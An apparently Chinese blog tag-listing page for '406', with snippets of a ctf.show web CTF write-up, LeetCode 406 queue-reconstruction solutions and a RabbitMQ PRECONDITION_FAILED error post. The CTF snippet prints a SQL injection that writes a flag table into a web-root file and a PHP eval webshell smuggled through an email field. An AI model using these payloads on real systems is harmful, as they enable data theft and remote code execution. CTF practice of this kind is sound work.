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查询Tags标签: 406,共有 5条记录
  • ctf_show-web入门-其他-(406-422)

    406;union/**/select/**/1,(select/**/flag/**/from/**/flag)/**/into/**/outfile/**/"/var/www/html/flag.txt"%23 407?ip=cafe::addip6地址,类的名字叫cafe都是16进制408?email="<?php eval($_POST[1]);?>"@123.php…

    2022/5/1 6:13:02 人评论 次浏览
  • LeetCode 406.根据身高重建队列 | 解题思路及代码

    根据身高重建队列 原题:406. Queue Reconstruction by Height Problem Description There are \(n\) people, we want them line up in the following way. Given a two-dimensional array: \(people[n][2]\), where \(people[i]=[h_i][k_i]\), \(h_i\) means the height…

    2022/4/23 23:15:37 人评论 次浏览
  • python获取mq队列数据报Queue.declare: (406) PRECONDITION_FAILED - inequivalent arg ‘x-max-priority‘

    缘由 使用kombu读取队列数据的时候报如下错误amqp.exceptions.PreconditionFailed: Queue.declare: (406) PRECONDITION_FAILED - inequivalent arg ‘x-max-priority’ for queue ‘’ in vhost ‘douyin_pggolden’: received none but current is …

    2021/11/26 17:39:45 人评论 次浏览
  • python获取mq队列数据报Queue.declare: (406) PRECONDITION_FAILED - inequivalent arg ‘x-max-priority‘

    缘由 使用kombu读取队列数据的时候报如下错误amqp.exceptions.PreconditionFailed: Queue.declare: (406) PRECONDITION_FAILED - inequivalent arg ‘x-max-priority’ for queue ‘’ in vhost ‘douyin_pggolden’: received none but current is …

    2021/11/26 17:39:45 人评论 次浏览
  • leecode 406

    /*** 解题思路:先排序再插入* 1.排序规则:按照先H高度降序,K个数升序排序* 2.遍历排序后的数组,根据K插入到K的位置上** 核心思想:高个子先站好位,矮个子插入到K位置上,前面肯定有K个高个子,矮个子再插到前面也满足K的要求** @param people* @return*/public int[…

    2021/6/5 10:52:02 人评论 次浏览